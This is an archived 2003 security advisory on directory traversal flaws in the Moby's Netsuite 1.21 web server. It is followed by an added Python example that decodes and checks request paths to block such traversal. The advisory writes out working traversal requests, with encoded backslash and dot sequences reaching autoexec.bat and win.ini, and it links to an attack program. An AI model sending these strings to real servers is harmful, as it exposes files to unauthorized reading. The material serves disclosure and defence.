Netsuite121.txt

Date: 15 Jul 2003. Reported by: Dr. Insane. Type: packetstorm. Source: packetstormsecurity.com

Moby's Netsuite 1.21 has directory traversal bugs allowing unauthorized file access.

Code
```text
Moby's Netsuite 1.21 Directory Traversal bugs
  
  
Release Date:  
13 July, 2003  
  
  
Description:  
NetSuite is a freeware server suite that allows anyone with a static IP address to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account.
Netsuite is designed for complete simplicity -- requiring only a few minutes to set up with no prior network skills or experience, and using virtually no memory or processor time. General Windows file management and an understanding of the Internet are required. There are two sections: Moby Mail and Moby Web. Both are very direct to install and use, requiring only a few minutes to begin using. Full source code for Microsoft Visual C++ 6.0 is available on the web.
  
There are several directory traversal vulnerabilities that allow someone to download or read
files outside the web folder. For the attack to work, URL-encoded characters (e.g. %5c for the backslash and %2e for the dot) have to be used instead of the literal ones, which is what lets the request slip past the server's path check.
  
  
The attack:  
  
GET / HTTP/1.1  
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat  
  
In our example above we want to see the file autoexec.bat.  
*** The folder /error/ doesn't exist on my PC :P hehe
  
Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini  
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini  
http://127.0.0.1/\..\..\..\windows\win.ini  
While I was searching I found about 25 attack strings. The above is only a small sample.
  
  
The Attack Program:  
I have created a sample attack program for Moby's Netsuite 1.21 (possibly it works for all versions of Moby's Netsuite). You can get it from here:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/  
  
  
Disclaimer  
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.  
  
  
Feedback  
Please send suggestions, updates, and comments to:  
Dr_insane  
[email protected]  
http://members.lycos.co.uk/r34ct/  
```
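As an added defender-side example (not part of the advisory or of Netsuite's own source), the following Python maps a request path onto a document root the way a hardened server should: it percent-decodes until stable (so double-encoded sequences are caught), treats backslashes as separators like a Windows server does, resolves dot segments lexically, and rejects any path that climbs above the root. `DOC_ROOT` is an assumed path, and the check is exercised against the advisory's own attack strings.

```python
import posixpath
from urllib.parse import unquote

# Constructed example document root; Netsuite's real layout is not on the page.
DOC_ROOT = "/srv/www"


def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing.

    A single unquote() turns %255c into %5c, which a naive check would accept;
    a second round turns it into the backslash the server would actually see.
    """
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            return s
        s = nxt
    return s


def resolve_request_path(raw_path: str, root: str = DOC_ROOT):
    """Return the filesystem path for raw_path under root, or None if it escapes.

    Covers the tricks from the advisory: %5c for '\\', %2e for '.', and raw
    backslashes. Resolution is purely lexical, so no filesystem access is needed
    before the decision is made.
    """
    path = fully_decode(raw_path)
    if "\0" in path:                  # NUL would truncate the path in C code
        return None
    path = path.replace("\\", "/")    # Windows separator -> POSIX separator
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue                  # empty (double slash) or current dir
        if seg == "..":
            if not segments:
                return None           # attempt to climb above the root
            segments.pop()
        else:
            segments.append(seg)
    return posixpath.join(root, *segments)


if __name__ == "__main__":
    for req in ("/index.html",
                "/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat",
                "/%5c..%5c..%5c..%5cwindows%5cwin%2eini"):
        print(req, "->", resolve_request_path(req))
```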
